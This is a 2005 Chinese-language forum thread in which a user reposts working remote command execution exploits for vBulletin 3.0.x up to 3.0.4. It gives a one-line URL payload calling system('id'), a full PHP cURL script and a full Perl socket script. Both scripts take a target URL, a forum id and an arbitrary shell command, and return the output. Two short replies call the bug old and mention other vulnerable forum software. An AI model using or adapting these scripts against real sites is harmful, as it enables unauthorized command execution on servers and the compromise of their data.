A-KUEI 10 發表於 June 22, 2005 檢舉 Share 發表於 June 22, 2005 vbulletin 3.0.xexecution Exploit: http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system(\'id\').\" ------------------------------------vBulletin 3.x \"forumdisplay.php\" Remote Code ... #!D:\\phpdev\\php\\php<?php/**************************************************************## vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net## First condition : $vboptions[\'showforumusers\'] == True , the admin must set# showforumusers ON in vbulletin options.# Second condition: $bbuserinfo[\'userid\'] == 0 , you must be an visitor/guest .# Third condition : $DB_site->fetch_array($forumusers) == True , when you# visit the forums, it must has at least# one user show the forum.# Fourth condition: magic_quotes_gpc must be OFF## Vulnerable Systems:# vBulletin version 3.0 up to and including version 3.0.4# # Immune systems:# vBulletin version 3.0.5# vBulletin version 3.0.6# **************************************************************/if (!(function_exists(\'curl_init\'))) {echo \"cURL extension required\\n\";exit;}if ($argv[3]){$url = $argv[1];$forumid = intval($argv[2]);$command = $argv[3];}else {echo \"vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\\n\\n\";echo \"Usage: \".$argv[0].\" <url> <forumid> <command> [proxy]\\n\\n\";echo \"<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\\n\";echo \"<forumid> forum id\\n\";echo \"<command> command to execute on server (ex: \'ls -la\')\\n\";echo \"[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\\n\\n\";echo \"ex :\\n\";echo \"\\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \\\"ls -al\\\"\";exit;}if ($argv[4])$proxy = $argv[4];$action = \'forumdisplay.php?GLOBALS[]=1&f=\'.$forumid.\'&comma=\".`echo _START_`.`\'.$command.\'`.`echo _END_`.\"\';$ch=curl_init();if ($proxy){curl_setopt($ch, CURLOPT_PROXY,$proxy);}curl_setopt($ch, CURLOPT_URL,$url.\'/\'.$action);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);$res=curl_exec ($ch);curl_close ($ch);$res = substr($res, strpos($res, \'_START_\')+7);$res = substr($res,0, strpos($res, \'_END_\'));echo $res;?>------------------------------------vbulletin 3.0.4 remote command execution #!/usr/bin/perl # vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net> # # Requirement: # showforumusers ON # # # bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net> # # usage : # vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command> # # example : # vbulletin30-xp.pl [url]http://192.168.1.78/forumdisplay.php[/url] 1 \"ls -la\" # # !! Happy Chinese new Year !! use IO::Socket; sub parse_url { local($url) = @_; if ($url =~ m#^(\\w+):#) { $protocol = $1; $protocol =~ tr/A-Z/a-z/; } else { return undef; } if ($protocol eq \"http\") { if ($url =~ m#^\\s*\\w+://([\\w-\\.]+):?(\\d*)([^ \\t]*)$#) { $server = $1; $server =~ tr/A-Z/a-z/; $port = ($2 ne \"\" ? $2 : $http_port); $path = ( $3 ? $3 : \'/\'); return ($protocol, $server, $port, $path); } return undef; } } sub urlencode{ my($esc) = @_; $esc =~ s/^\\s+|\\s+$//gs; $esc =~ s/([^a-zA-Z0-9_\\-.])/uc sprintf(\"%%%02x\",ord($1))/eg; $esc =~ s/ /\\+/g; $esc =~ s/%20/\\+/g; return $esc; } $url = $ARGV[0]; $fid = $ARGV[1]; $cmd = urlencode($ARGV[2]); $http_port = 80; $shellcode =\"GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\\${system(\\$cmd)}}{\\${exit()}}\"; @target = parse_url($url); $conn = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $target[1], PeerPort => $target[2], ) or die \"\\nUnable to connect\\n\"; $conn -> autoflush(1); print $conn \"GET $target[3]?$shellcode HTTP/1.1\\r\\nHost: $target[1]:$target[2]\\r\\nConnection: Close\\r\\n\\r\\n\"; while (<$conn>){ print $_; } close $conn; ------------------------------------都是很久以前的漏洞...之前剛好看到看這裡好少東西,就當灌水貼了= =... 鏈接文章 分享到其他網站
ckmarkhsu 7 發表於 June 22, 2005 檢舉 Share 發表於 June 22, 2005 你這是在哪個資安網站找的阿?這是滿久前的漏洞了不過深藍的版本更久啦XDD 所以不受影響|||要找漏洞phpBB才多呢XDD 鏈接文章 分享到其他網站
A-KUEI 10 發表於 June 22, 2005 作者 檢舉 Share 發表於 June 22, 2005 說實話...我的文件夾找的= =好像是2月左右找到的哪個網站當然...忘了= =".... 鏈接文章 分享到其他網站
Recommended Posts
請登入後來留意見
在登入之後,您才能留意見
立即登入